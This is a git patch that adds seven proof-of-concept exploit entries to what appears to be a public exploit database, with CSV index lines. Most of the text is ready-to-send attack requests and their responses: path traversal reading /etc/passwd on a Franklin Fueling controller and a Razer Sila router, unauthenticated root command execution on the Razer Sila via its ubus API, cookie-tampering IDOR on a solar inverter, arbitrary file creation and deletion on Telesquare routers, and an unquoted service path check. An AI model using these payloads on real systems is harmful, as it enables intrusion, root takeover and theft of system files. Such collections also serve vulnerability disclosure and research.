From 6457d1796d5d98f99f97cfc01aacc0ad708f3706 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 12 Apr 2022 05:01:35 +0000 Subject: [PATCH] DB: 2022-04-12 7 changes to exploits/shellcodes MiniTool Partition Wizard - Unquoted Service Path Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI) SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR) Telesquare TLR-2855KS6 - Arbitrary File Creation Telesquare TLR-2855KS6 - Arbitrary File Deletion Razer Sila - Local File Inclusion (LFI) Razer Sila - Command Injection --- exploits/hardware/webapps/50860.txt | 35 +++++++++++++++++ exploits/hardware/webapps/50862.txt | 22 +++++++++++ exploits/hardware/webapps/50863.txt | 23 +++++++++++ exploits/hardware/webapps/50864.txt | 36 +++++++++++++++++ exploits/hardware/webapps/50865.txt | 61 +++++++++++++++++++++++++++++ exploits/linux/remote/50861.txt | 26 ++++++++++++ exploits/windows/local/50859.txt | 31 +++++++++++++++ files_exploits.csv | 7 ++++ 8 files changed, 241 insertions(+) create mode 100644 exploits/hardware/webapps/50860.txt create mode 100644 exploits/hardware/webapps/50862.txt create mode 100644 exploits/hardware/webapps/50863.txt create mode 100644 exploits/hardware/webapps/50864.txt create mode 100644 exploits/hardware/webapps/50865.txt create mode 100644 exploits/linux/remote/50861.txt create mode 100644 exploits/windows/local/50859.txt diff --git a/exploits/hardware/webapps/50860.txt b/exploits/hardware/webapps/50860.txt new file mode 100644 index 000000000..8fef3c84f --- /dev/null +++ b/exploits/hardware/webapps/50860.txt @@ -0,0 +1,35 @@ +# Exploit Title: SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR) +# Date: 7/4/2022 +# Exploit Author: Momen Eldawakhly (Cyber Guy) +# Vendor Homepage: https://www.sma.de +# Version: SUNNY TRIPOWER 5.0 Firmware version 3.10.16.R +# Tested on: Linux [Firefox] +# CVE : CVE-2021-46416 + +# Proof of Concept + +============[ Normal user request ]============ + +GET / HTTP/1.1 +Host: 192.168.1.4 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Cookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A861%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D +Upgrade-Insecure-Requests: 1 + +============[ Manipulated username request ]============ + +GET / HTTP/1.1 +Host: 192.168.1.4 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Cookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A850%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D +Upgrade-Insecure-Requests: 1 \ No newline at end of file diff --git a/exploits/hardware/webapps/50862.txt b/exploits/hardware/webapps/50862.txt new file mode 100644 index 000000000..9c4633d7f --- /dev/null +++ b/exploits/hardware/webapps/50862.txt @@ -0,0 +1,22 @@ +# Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Creation +# Date: 7/4/2022 +# Exploit Author: Momen Eldawakhly (Cyber Guy) +# Vendor Homepage: http://www.telesquare.co.kr/ +# Version: TLR-2855KS6 +# Tested on: Linux [Firefox] +# CVE : CVE-2021-46418 + +# Proof of Concept + +PUT /cgi-bin/testing_cve.txt HTTP/1.1 +Host: 192.168.1.5 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Cookie: nonce=1642692359833588 +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 32 \ No newline at end of file diff --git a/exploits/hardware/webapps/50863.txt b/exploits/hardware/webapps/50863.txt new file mode 100644 index 000000000..97a13c546 --- /dev/null +++ b/exploits/hardware/webapps/50863.txt @@ -0,0 +1,23 @@ +# Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Deletion +# Date: 7/4/2022 +# Exploit Author: Momen Eldawakhly (Cyber Guy) +# Vendor Homepage: http://www.telesquare.co.kr/ +# Version: TLR-2855KS6 +# Tested on: Linux [Firefox] +# CVE : CVE-2021-46419 + +# Proof of Concept + +DELETE /cgi-bin/test.cgi HTTP/1.1 +Host: 192.168.1.5 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-type: application/x-www-form-urlencoded +Content-Length: 438 +Origin: http://192.168.1.5 +DNT: 1 +Connection: close +Referer: http://192.168.1.5/ +Cookie: nonce=16426923592222 \ No newline at end of file diff --git a/exploits/hardware/webapps/50864.txt b/exploits/hardware/webapps/50864.txt new file mode 100644 index 000000000..bed46238f --- /dev/null +++ b/exploits/hardware/webapps/50864.txt @@ -0,0 +1,36 @@ +# Exploit Title: Razer Sila - Local File Inclusion (LFI) +# Google Dork: N/A +# Date: 4/9/2022 +# Exploit Author: Kevin Randall +# Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila +# Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila +# Version: RazerSila-2.0.441_api-2.0.418 +# Tested on: Razer Sila Router +# CVE N/A + +# Proof of Concept + +# Request +POST /ubus/ HTTP/1.1 +Host: 192.168.8.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 123 +Origin: https://192.168.8.1 +Referer: https://192.168.8.1/ +Te: trailers +Connection: close + +{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]} + +# Reponse +HTTP/1.1 200 OK +Connection: close +Content-Type: application/json +Content-Length: 537 + +{"jsonrpc":"2.0","id":3,"result":[0,{"data":"root:x:0:0:root:\/root:\/bin\/ash\ndaemon:*:1:1:daemon:\/var:\/bin\/false\nftp:*:55:55:ftp:\/home\/ftp:\/bin\/false\nnetwork:*:101:101:network:\/var:\/bin\/false\nnobody:*:65534:65534:nobody:\/var:\/bin\/false\ndnsmasq:x:453:453:dnsmasq:\/var\/run\/dnsmasq:\/bin\/false\nmosquitto:x:200:200:mosquitto:\/var\/run\/mosquitto:\/bin\/false\nlldp:x:121:129:lldp:\/var\/run\/lldp:\/bin\/false\nadmin:x:1000:1000:root:\/home\/admin:\/bin\/false\nportal:x:1001:1001::\/home\/portal:\/bin\/false\n"}]} \ No newline at end of file diff --git a/exploits/hardware/webapps/50865.txt b/exploits/hardware/webapps/50865.txt new file mode 100644 index 000000000..b68744fe0 --- /dev/null +++ b/exploits/hardware/webapps/50865.txt @@ -0,0 +1,61 @@ +# Exploit Title: Razer Sila - Command Injection +# Google Dork: N/A +# Date: 4/9/2022 +# Exploit Author: Kevin Randall +# Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila +# Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila +# Version: RazerSila-2.0.441_api-2.0.418 +# Tested on: Razer Sila Router +# CVE N/A + +# Proof of Concept + +# Request +POST /ubus/ HTTP/1.1 +Host: 192.168.8.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 117 +Origin: https://192.168.8.1 +Referer: https://192.168.8.1/ +Te: trailers +Connection: close + +{"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"id"}]} + +# Response +HTTP/1.1 200 OK +Connection: close +Content-Type: application/json +Content-Length: 85 + +{"jsonrpc":"2.0","id":3,"result":[0,{"code":0,"stdout":"uid=0(root) gid=0(root)\n"}]} + +# Request +POST /ubus/ HTTP/1.1 +Host: 192.168.8.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 117 +Origin: https://192.168.8.1 +Referer: https://192.168.8.1/ +Te: trailers +Connection: close + +{"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"ls"}]} + +# Response +HTTP/1.1 200 OK +Connection: close +Content-Type: application/json +Content-Length: 172 + +{"jsonrpc":"2.0","id":3,"result":[0,{"code":0,"stdout":"bin\ndev\netc\nhome\ninit\nlib\nmnt\nno_gui\noverlay\nproc\nrom\nroot\nsbin\nservices\nsys\ntmp\nusr\nvar\nwww\n"}]} \ No newline at end of file diff --git a/exploits/linux/remote/50861.txt b/exploits/linux/remote/50861.txt new file mode 100644 index 000000000..2a8c968e6 --- /dev/null +++ b/exploits/linux/remote/50861.txt @@ -0,0 +1,26 @@ +# Exploit Title: Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI) +# Date: 7/4/2022 +# Exploit Author: Momen Eldawakhly (Cyber Guy) +# Vendor Homepage: https://www.franklinfueling.com/ +# Version: 1.8.19.8580 +# Tested on: Linux [Firefox] +# CVE : CVE-2021-46417 + +# Proof of Concept + +============[ HTTP Exploitation ]============ + +GET /18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1 +Host: 192.168.1.6 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Cookie: Prefs=LID%3Des%3BPDS%3DMM/dd/yyyy%3BPDL%3DEEEE%2C%20MMMM%20dd%2C%20yyyy%3BPDY%3DMMMM%2C%20yyyy%3BPTS%3DHH%3Amm%3BPTL%3DHH%3Amm%3Ass%3BDSP%3D.%3BGSP%3D%2C%3BGRP%3D3%3BLDZ%3Dtrue%3BUVL%3DuvGallons%3BULN%3DulMillimeters%3BUTM%3DutCentigrade%3BUPR%3DupPSI%3BUP2%3Dup2inWater%3BUP3%3Dup3inHg%3BUFL%3Dufgpm%3BUDY%3Dudkgpcm%3BUMS%3Dumkgrams%3BRPR%3D30%3BXML%3Dfalse%3B +Upgrade-Insecure-Requests: 1 + +============[ URL Exploitation ]============ + +http://192.168.1.6/18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= \ No newline at end of file diff --git a/exploits/windows/local/50859.txt b/exploits/windows/local/50859.txt new file mode 100644 index 000000000..7704e4c16 --- /dev/null +++ b/exploits/windows/local/50859.txt @@ -0,0 +1,31 @@ +# Exploit Title: MiniTool Partition Wizard - Unquoted Service Path +# Date: 07/04/2022 +# Exploit Author: Saud Alenazi +# Vendor Homepage: https://www.minitool.com/ +# Software Link: https://www.minitool.com/download-center/ +# Version: 12.0 +# Tested: Windows 10 Pro x64 es + +# PoC : + +C:\Users\saudh>sc qc MTSchedulerService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: MTSchedulerService + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : MTSchedulerService + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users\saudh>icacls "C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe" + +C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe NT AUTHORITY\SYSTEM:(I)(F) + BUILTIN\Administrators:(I)(F) + BUILTIN\Users:(I)(RX) + +Successfully processed 1 files; Failed processing 0 files \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index fa0021d05..2d0b7ac61 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11476,6 +11476,7 @@ id,file,description,date,author,type,platform,port 50837,exploits/windows/local/50837.txt,"ProtonVPN 1.26.0 - Unquoted Service Path",1970-01-01,gemreda,local,windows, 50852,exploits/windows/local/50852.txt,"Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path",1970-01-01,"Manthan Chhabra",local,windows, 50858,exploits/linux/local/50858.txt,"binutils 2.37 - Objdump Segmentation Fault",1970-01-01,"Marlon Petry",local,linux, +50859,exploits/windows/local/50859.txt,"MiniTool Partition Wizard - Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 @@ -18662,6 +18663,7 @@ id,file,description,date,author,type,platform,port 50848,exploits/hardware/remote/50848.py,"Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)",1970-01-01,sharkmoos,remote,hardware, 50856,exploits/hardware/remote/50856.py,"Kramer VIAware - Remote Code Execution (RCE) (Root)",1970-01-01,sharkmoos,remote,hardware, 50857,exploits/multiple/remote/50857.txt,"Opmon 9.11 - Cross-site Scripting",1970-01-01,"Marlon Petry",remote,multiple, +50861,exploits/linux/remote/50861.txt,"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI)",1970-01-01,"Momen Eldawakhly",remote,linux, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, @@ -44926,3 +44928,8 @@ id,file,description,date,author,type,platform,port 50853,exploits/php/webapps/50853.txt,"minewebcms 1.15.2 - Cross-site Scripting (XSS)",1970-01-01,"Chetanya Sharma",webapps,php, 50854,exploits/php/webapps/50854.txt,"qdPM 9.2 - Cross-site Request Forgery (CSRF)",1970-01-01,"Chetanya Sharma",webapps,php, 50855,exploits/php/webapps/50855.txt,"ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion",1970-01-01,"Devansh Bordia",webapps,php, +50860,exploits/hardware/webapps/50860.txt,"SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR)",1970-01-01,"Momen Eldawakhly",webapps,hardware, +50862,exploits/hardware/webapps/50862.txt,"Telesquare TLR-2855KS6 - Arbitrary File Creation",1970-01-01,"Momen Eldawakhly",webapps,hardware, +50863,exploits/hardware/webapps/50863.txt,"Telesquare TLR-2855KS6 - Arbitrary File Deletion",1970-01-01,"Momen Eldawakhly",webapps,hardware, +50864,exploits/hardware/webapps/50864.txt,"Razer Sila - Local File Inclusion (LFI)",1970-01-01,"Kevin Randall",webapps,hardware, +50865,exploits/hardware/webapps/50865.txt,"Razer Sila - Command Injection",1970-01-01,"Kevin Randall",webapps,hardware,